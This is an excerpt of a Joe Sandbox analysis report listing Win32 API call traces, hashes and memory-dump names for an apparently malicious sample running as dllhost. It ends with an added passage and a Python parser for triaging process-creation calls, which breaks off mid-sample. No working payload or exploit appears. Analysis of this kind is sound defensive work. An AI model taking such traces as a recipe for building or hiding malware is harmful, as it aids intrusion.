                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                                              APIs
                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                                              • Opcode Fuzzy Hash: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                                              • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                              • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                              • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                              APIs
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,005A5ADC,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                                • Part of subcall function 00405831: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                                • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                                              • CloseHandle.KERNEL32(?), ref: 00401F47
                                                                                • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                                                • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2972824698-0
                                                                              • Opcode ID: 665e09d7c53e364fc1df005af6411e0beff931482f0affcbd5e419fff00f5d35
                                                                              • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                                              • Opcode Fuzzy Hash: 665e09d7c53e364fc1df005af6411e0beff931482f0affcbd5e419fff00f5d35
                                                                              • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                              • LoadBitmapW.USER32 ref: 00404CAC
                                                                              • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                              • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                              • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                              • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                              • ShowWindow.USER32(00000000), ref: 0040520D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                                              • Opcode Fuzzy Hash: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                              • GetSysColor.USER32(?), ref: 0040445E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                              • SendMessageW.USER32(00000000), ref: 00404501
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                              • LoadCursorW.USER32 ref: 0040457D
                                                                              • SetCursor.USER32(00000000), ref: 00404580
                                                                              • LoadCursorW.USER32 ref: 00404599
                                                                              • SetCursor.USER32(00000000), ref: 0040459C
                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: : Completed$L)Z$N
                                                                              • API String ID: 3103080414-1128940705
                                                                              • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                                              • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                              • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
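The function records above all follow one line shape: a direct call is written as `Name.MODULE(args), ref: address`, a call reached through a callee as `Part of subcall function ADDR: Name.MODULE(args), ref: address`, and each record carries the memory-dump name, the image base and a derived `API ID` key. Working through a few hundred such records by eye is slow, so the following is an added example (my own code, not part of the Joe Sandbox report or its tooling) that parses records of this shape into structured calls, flags the process-creation calls a hollowing hunt cares about, decodes the `dwCreationFlags` argument of `CreateProcessW` with the documented Win32 bit values, and builds a crude token-frequency fingerprint in the spirit of the report's `API ID` column. Assumptions: the sample input is constructed from the line shapes on this page; the first dotted field of the `.sdmp` name is read as the PID in hex (0x17 = 23, which agrees with the `hcaresult_23_2_400000_dllhost.jbxd` snapshot name above); and the stoplist used by the fingerprint is my own choice, not the undocumented rule the report uses, so the key it produces will not equal the report's `API ID`.

```python
"""Parse Joe Sandbox-style 'APIs' function records into structured calls and triage them."""
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: two records in the exact line shapes the report uses.
SAMPLE = """\
APIs
• CloseHandle.KERNEL32(?), ref: 00401F47
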